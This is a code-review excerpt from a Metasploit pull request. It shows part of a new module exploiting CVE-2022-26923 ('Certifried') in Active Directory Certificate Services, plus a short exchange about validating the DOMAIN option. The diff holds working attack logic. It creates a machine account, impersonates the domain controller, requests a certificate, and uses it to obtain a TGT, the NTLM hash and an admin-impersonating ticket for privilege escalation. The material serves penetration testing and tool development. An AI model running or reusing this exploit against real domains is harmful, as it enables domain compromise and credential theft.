modules/auxiliary/admin/dcerpc/cve_2022_26923_certifried.rb

```diff
@@ -0,0 +1,513 @@
+
+    opts = {}
+    validate_options
+    unless can_add_computer?
+      fail_with(Failure::NoAccess, 'Machine account quota is zero, this user cannot create a computer account')
+    end
+
+    opts[:tree] = connect_smb
+    computer_info = add_computer(opts)
+    disconnect_smb(opts.delete(:tree))
+
+    impersonate_dc(computer_info.name)
+
+    opts = {
+      username: computer_info.name,
+      password: computer_info.password
+    }
+    opts[:tree] = connect_smb(opts)
+    opts[:cert_template] = 'Machine'
+    cert = request_certificate(opts)
+    fail_with(Failure::UnexpectedReply, 'Unable to request the certificate.') unless cert
+
+    if ['AUTHENTICATE', 'PRIVESC'].include?(action.name)
+      credential, key = get_tgt(cert)
+      fail_with(Failure::UnexpectedReply, 'Unable to request the TGT.') unless credential && key
+
+      get_ntlm_hash(credential, key)
+    end
+
+    if action.name == 'PRIVESC'
+      request_ticket(credential)
+      @privesc_success = true
+    end
+  rescue MsSamrConnectionError, MsIcprConnectionError => e
+    fail_with(Failure::Unreachable, e.message)
+  rescue MsSamrAuthenticationError, MsIcprAuthenticationError => e
+    fail_with(Failure::NoAccess, e.message)
+  rescue MsSamrNotFoundError, MsIcprNotFoundError => e
+    fail_with(Failure::NotFound, e.message)
+  rescue MsSamrBadConfigError => e
+    fail_with(Failure::BadConfig, e.message)
+  rescue MsSamrUnexpectedReplyError, MsIcprUnexpectedReplyError => e
+    fail_with(Failure::UnexpectedReply, e.message)
+  rescue MsSamrUnknownError, MsIcprUnknownError => e
+    fail_with(Failure::Unknown, e.message)
+  ensure
+    print_status("Deleting the computer account #{computer_info&.name}")
+    disconnect_smb(opts.delete(:tree)) if opts[:tree]
+    if @privesc_success
+      # If the privilege escalation succeeded, let'use the cached TGS
+      # impersonating the admin to delete the computer account
+      datastore['SMBAuth'] = Msf::Exploit::Remote::AuthOption::KERBEROS
+      datastore['SmbRhostname'] = "#{datastore['DC_NAME']}.#{datastore['DOMAIN']}"
+      datastore['SMBDomain'] = datastore['DOMAIN']
+      datastore['DomainControllerRhost'] = rhost
+      tree = connect_smb(username: datastore['IMPERSONATE'])
+    else
+      tree = connect_smb
+    end
+    opts = {
+      tree: tree,
+      computer_name: computer_info&.name
+    }
+    begin
+      delete_computer(opts) if opts[:tree] && opts[:computer_name]
+    rescue MsSamrUnknownError => e
+      print_warning("Unable to delete the computer account, this will have to be done manually with an Administrator account (#{e.message})")
+    end
+    disconnect_smb(opts.delete(:tree)) if opts[:tree]
+  end
+
+  def validate_options
+    if datastore['USERNAME'].blank?
+      fail_with(Failure::BadConfig, 'USERNAME not set')
+    end
+    if datastore['PASSWORD'].blank?
+      fail_with(Failure::BadConfig, 'PASSWORD not set')
+    end
+    if datastore['DOMAIN'].blank?
```

Comment:
The DOMAIN needs to be the FQDN. I think that'd be worth validating here as well as adding to the option description (which does unfortunately mean it'll need to be added).

Reply:
Absolutely, I improved option validation in [2072111](https://github.com/rapid7/metasploit-framework/pull/17066/commits/207211171380dd32821c4e78d2fd58652bef6fa8)